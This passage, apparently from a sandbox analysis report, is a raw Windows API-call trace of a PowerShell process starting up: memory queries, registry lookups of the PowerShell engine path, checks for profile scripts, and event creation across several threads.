	[0355.031] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.031] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.031] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.031] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.031] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.031] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.031] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.031] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.032] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.032] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.032] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.032] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.032] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.033] CoTaskMemFree (pv=0x1b90d0) 
	[0355.034] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.035] CoTaskMemFree (pv=0x1b90d0) 
	[0355.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.057] VirtualQuery (in: lpAddress=0xabc00, lpBuffer=0xacac0, dwLength=0x30 | out: lpBuffer=0xacac0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.062] VirtualQuery (in: lpAddress=0xabc00, lpBuffer=0xacac0, dwLength=0x30 | out: lpBuffer=0xacac0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.062] VirtualQuery (in: lpAddress=0xab450, lpBuffer=0xac310, dwLength=0x30 | out: lpBuffer=0xac310*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.062] VirtualQuery (in: lpAddress=0xab450, lpBuffer=0xac310, dwLength=0x30 | out: lpBuffer=0xac310*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.063] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xada58 | out: phkResult=0xada58*=0x334) returned 0x0
	[0355.063] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad9dc, lpData=0x0, lpcbData=0xad9d8*=0x0 | out: lpType=0xad9dc*=0x1, lpData=0x0, lpcbData=0xad9d8*=0x56) returned 0x0
	[0355.063] CoTaskMemAlloc (cb=0x5a) returned 0x1b8c2df0
	[0355.063] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad9ac, lpData=0x1b8c2df0, lpcbData=0xad9a8*=0x56 | out: lpType=0xad9ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad9a8*=0x56) returned 0x0
	[0355.063] CoTaskMemFree (pv=0x1b8c2df0) 
	[0355.063] RegCloseKey (hKey=0x334) returned 0x0
	[0355.063] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xada58 | out: phkResult=0xada58*=0x334) returned 0x0
	[0355.063] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad9dc, lpData=0x0, lpcbData=0xad9d8*=0x0 | out: lpType=0xad9dc*=0x1, lpData=0x0, lpcbData=0xad9d8*=0x56) returned 0x0
	[0355.063] CoTaskMemAlloc (cb=0x5a) returned 0x1b8c2df0
	[0355.064] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad9ac, lpData=0x1b8c2df0, lpcbData=0xad9a8*=0x56 | out: lpType=0xad9ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad9a8*=0x56) returned 0x0
	[0355.064] CoTaskMemFree (pv=0x1b8c2df0) 
	[0355.064] RegCloseKey (hKey=0x334) returned 0x0
	[0355.064] CoTaskMemAlloc (cb=0x20c) returned 0x1b897970
	[0355.064] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b897970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0355.064] CoTaskMemFree (pv=0x1b897970) 
	[0355.064] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xad610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0355.064] CoTaskMemAlloc (cb=0x20c) returned 0x1b897970
	[0355.064] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b897970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0355.064] CoTaskMemFree (pv=0x1b897970) 
	[0355.064] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xad610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0355.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xad7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0355.065] SetErrorMode (uMode=0x1) returned 0x1
	[0355.065] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xad9c0 | out: lpFileInformation=0xad9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0355.065] SetErrorMode (uMode=0x1) returned 0x1
	[0355.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xad7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0355.065] SetErrorMode (uMode=0x1) returned 0x1
	[0355.065] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xad9c0 | out: lpFileInformation=0xad9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0355.066] SetErrorMode (uMode=0x1) returned 0x1
	[0355.066] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xad7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0355.066] SetErrorMode (uMode=0x1) returned 0x1
	[0355.066] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xad9c0 | out: lpFileInformation=0xad9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0355.066] SetErrorMode (uMode=0x1) returned 0x1
	[0355.066] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xad7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0355.066] SetErrorMode (uMode=0x1) returned 0x1
	[0355.066] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xad9c0 | out: lpFileInformation=0xad9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0355.066] SetErrorMode (uMode=0x1) returned 0x1
	[0355.067] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.067] CoTaskMemFree (pv=0x1b90d0) 
	[0355.067] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.067] CoTaskMemFree (pv=0x1b90d0) 
	[0355.067] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.068] CoTaskMemFree (pv=0x1b90d0) 
	[0355.068] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.068] CoTaskMemFree (pv=0x1b90d0) 
	[0355.071] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.071] CoTaskMemFree (pv=0x1b90d0) 
	[0355.071] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x334
	[0355.071] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x338
	[0355.071] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0355.072] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0355.072] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x328
	[0355.072] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x2fc
	[0355.072] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0355.072] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x378
	[0355.072] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x37c
	[0355.072] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1cc
	[0355.072] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0355.072] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0355.073] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.073] CoTaskMemFree (pv=0x1b90d0) 
	[0355.184] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0355.184] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xadba0 | out: lpMode=0xadba0) returned 1
	[0355.185] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.185] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.185] CoTaskMemFree (pv=0x1b90d0) 
	[0355.188] SetEvent (hEvent=0x340) returned 1
	[0355.188] SetEvent (hEvent=0x334) returned 1
	[0355.188] SetEvent (hEvent=0x338) returned 1
	[0355.188] SetEvent (hEvent=0x33c) returned 1
	[0355.188] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0355.190] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.190] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.190] CoTaskMemFree (pv=0x1b90d0) 
	[0355.190] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xad8f8 | out: phkResult=0xad8f8*=0x354) returned 0x0
	[0355.190] RegQueryValueExW (in: hKey=0x354, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xad87c, lpData=0x0, lpcbData=0xad878*=0x0 | out: lpType=0xad87c*=0x0, lpData=0x0, lpcbData=0xad878*=0x0) returned 0x2

Thread:
	id = 136
	os_tid = 0x714


Thread:
	id = 142
	os_tid = 0xacc


Thread:
	id = 179
	os_tid = 0x648


Thread:
	id = 249
	os_tid = 0xd38


Thread:
	id = 258
	os_tid = 0xd5c

	[0308.183] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0344.998] LocalFree (hMem=0x1c72c0) returned 0x0
	[0344.998] CloseHandle (hObject=0x318) returned 1
	[0344.998] CloseHandle (hObject=0x13) returned 1
	[0344.999] CloseHandle (hObject=0xf) returned 1
	[0344.999] RegCloseKey (hKey=0x304) returned 0x0
	[0344.999] RegCloseKey (hKey=0x300) returned 0x0
	[0344.999] RegCloseKey (hKey=0x2fc) returned 0x0
	[0345.000] LocalFree (hMem=0x1c7290) returned 0x0
	[0345.000] RegCloseKey (hKey=0x328) returned 0x0
	[0347.301] RegCloseKey (hKey=0x328) returned 0x0
	[0351.525] RegCloseKey (hKey=0x32c) returned 0x0
	[0351.526] RegCloseKey (hKey=0x318) returned 0x0
	[0351.526] RegCloseKey (hKey=0x304) returned 0x0
	[0351.526] RegCloseKey (hKey=0x2fc) returned 0x0
	[0351.526] RegCloseKey (hKey=0x328) returned 0x0
	[0351.526] RegCloseKey (hKey=0x340) returned 0x0
	[0351.527] RegCloseKey (hKey=0x33c) returned 0x0
	[0351.527] RegCloseKey (hKey=0x338) returned 0x0
	[0351.527] RegCloseKey (hKey=0x334) returned 0x0
	[0351.527] RegCloseKey (hKey=0x330) returned 0x0
	[0354.327] RegCloseKey (hKey=0x374) returned 0x0
	[0354.327] RegCloseKey (hKey=0x370) returned 0x0
	[0354.327] RegCloseKey (hKey=0x36c) returned 0x0
	[0354.327] RegCloseKey (hKey=0x368) returned 0x0
	[0354.327] RegCloseKey (hKey=0x318) returned 0x0
	[0354.328] RegCloseKey (hKey=0x380) returned 0x0
	[0354.328] RegCloseKey (hKey=0x360) returned 0x0
	[0354.328] RegCloseKey (hKey=0x35c) returned 0x0
	[0354.328] RegCloseKey (hKey=0x358) returned 0x0
	[0354.328] RegCloseKey (hKey=0x354) returned 0x0
	[0354.329] RegCloseKey (hKey=0x350) returned 0x0
	[0354.329] RegCloseKey (hKey=0x34c) returned 0x0
	[0354.329] RegCloseKey (hKey=0x32c) returned 0x0
	[0354.329] RegCloseKey (hKey=0x1cc) returned 0x0
	[0354.329] RegCloseKey (hKey=0x37c) returned 0x0
	[0354.329] RegCloseKey (hKey=0x378) returned 0x0
	[0354.330] RegCloseKey (hKey=0x304) returned 0x0
	[0354.330] RegCloseKey (hKey=0x2fc) returned 0x0
	[0354.330] RegCloseKey (hKey=0x328) returned 0x0
	[0354.330] RegCloseKey (hKey=0x340) returned 0x0
	[0354.330] RegCloseKey (hKey=0x33c) returned 0x0
	[0354.331] RegCloseKey (hKey=0x338) returned 0x0
	[0354.331] RegCloseKey (hKey=0x334) returned 0x0
	[0354.331] RegCloseKey (hKey=0x330) returned 0x0
	[0641.511] RegCloseKey (hKey=0x354) returned 0x0

Thread:
	id = 269
	os_tid = 0xdb0


Thread:
	id = 372
	os_tid = 0xbf0

	[0355.310] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0355.314] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0355.320] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.320] CoTaskMemFree (pv=0x1b90d0) 
	[0355.322] VirtualQuery (in: lpAddress=0x1c79d980, lpBuffer=0x1c79e840, dwLength=0x30 | out: lpBuffer=0x1c79e840*(BaseAddress=0x1c79d000, AllocationBase=0x1be10000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.325] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.325] CoTaskMemFree (pv=0x1b90d0) 
	[0355.328] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.328] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.328] CoTaskMemFree (pv=0x1b90d0) 
	[0355.331] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.331] CoTaskMemFree (pv=0x1b90d0) 
	[0355.341] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.341] CoTaskMemFree (pv=0x1b90d0) 
	[0355.344] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.344] CoTaskMemFree (pv=0x1b90d0) 
	[0355.345] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.345] CoTaskMemFree (pv=0x1b90d0) 
	[0355.350] VirtualQuery (in: lpAddress=0x1c79dc30, lpBuffer=0x1c79eaf0, dwLength=0x30 | out: lpBuffer=0x1c79eaf0*(BaseAddress=0x1c79d000, AllocationBase=0x1be10000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.351] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.351] CoTaskMemFree (pv=0x1b90d0) 
	[0355.354] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0355.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.354] CoTaskMemFree (pv=0x1b90d0) 
	[0355.354] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
